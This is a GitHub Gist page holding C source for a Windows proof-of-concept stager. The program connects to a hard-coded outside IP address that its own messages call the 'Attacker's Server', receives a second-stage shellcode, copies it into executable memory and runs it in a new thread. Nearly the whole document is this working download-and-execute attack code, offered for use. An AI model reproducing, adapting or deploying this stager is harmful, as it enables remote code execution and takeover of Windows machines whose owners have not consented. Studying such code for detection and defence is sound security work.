Created
November 25, 2019 17:59
-
-
Save JohnTroony/a62f79dcfac702018d2e64ba129906d8 to your computer and use it in GitHub Desktop.
Windows Shellcoding: PoC code for connect back shellcode that fetch a second stage shellcode and executes it.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<winsock2.h> | |
| //Winsock Library | |
| #pragma comment(lib,"ws2_32.lib") | |
| // John (Troon) Ombagi | |
| // Twitter/Github : @johntroony | |
| int main(int argc, char **argv){ | |
| WSADATA wsa; | |
| SOCKET s; | |
| struct sockaddr_in server; | |
| char *message; | |
| unsigned char second_shellcode[2048]; | |
| int recv_size; | |
| // initialize Winsock and check for any error | |
| printf("\n[+] Initializing Winsock...\n"); | |
| if (WSAStartup(MAKEWORD(2,2),&wsa) != 0) | |
| { | |
| printf("\n[!] Failed. Error Code : %d",WSAGetLastError()); | |
| return 1; | |
| } | |
| printf("\n[-] Winsock Initialised\n"); | |
| // create a socket and check for any error | |
| printf("\n[+] Creating a Socket...\n"); | |
| if((s = socket(AF_INET , SOCK_STREAM , 0 )) == INVALID_SOCKET) | |
| { | |
| printf("\n[!] Could not create socket. Error : %d" , WSAGetLastError()); | |
| } | |
| printf("\n[-] Socket created\n"); | |
| // Specify remote IP, family (TCP type) and port | |
| server.sin_addr.s_addr = inet_addr("45.32.115.43"); | |
| server.sin_family = AF_INET; | |
| server.sin_port = htons( 8080 ); | |
| // connect to the remote IP:Port and chek for any errors | |
| printf("\n[+] Connecting to Attacker's Server...\n"); | |
| if (connect(s , (struct sockaddr *)&server , sizeof(server)) < 0) | |
| { | |
| puts("\n[!] Server connection failed."); | |
| return 1; | |
| } | |
| puts("\n[-] Connected to Attacker's Server"); | |
| // get second stage shellcode and check for any errors | |
| puts("\n[+] Receiving Second Stage Shellcode from the Server"); | |
| if((recv_size = recv(s , second_shellcode , 2048 , 0)) == SOCKET_ERROR) | |
| { | |
| puts("\n[!] Failed to receive second stage shellcode"); | |
| } | |
| puts("\n[-] Second Stage Shellcode received"); | |
| second_shellcode[recv_size]; | |
| // allocate memory for the second stage shellcode and execute it | |
| puts("\n[+] Executing Shellcode..."); | |
| // memory allocation | |
| LPVOID addressPointer = VirtualAlloc(NULL, sizeof(second_shellcode), 0x3000, 0x40); | |
| // copy the second stage shellcode | |
| RtlMoveMemory(addressPointer, second_shellcode, sizeof(second_shellcode)); | |
| // create thread pointing to shellcode address | |
| CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)addressPointer, NULL, 0, 0); | |
| // sleep for a second to wait for the thread | |
| Sleep(1000); | |
| puts("\n[-] Shellcode Executed "); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment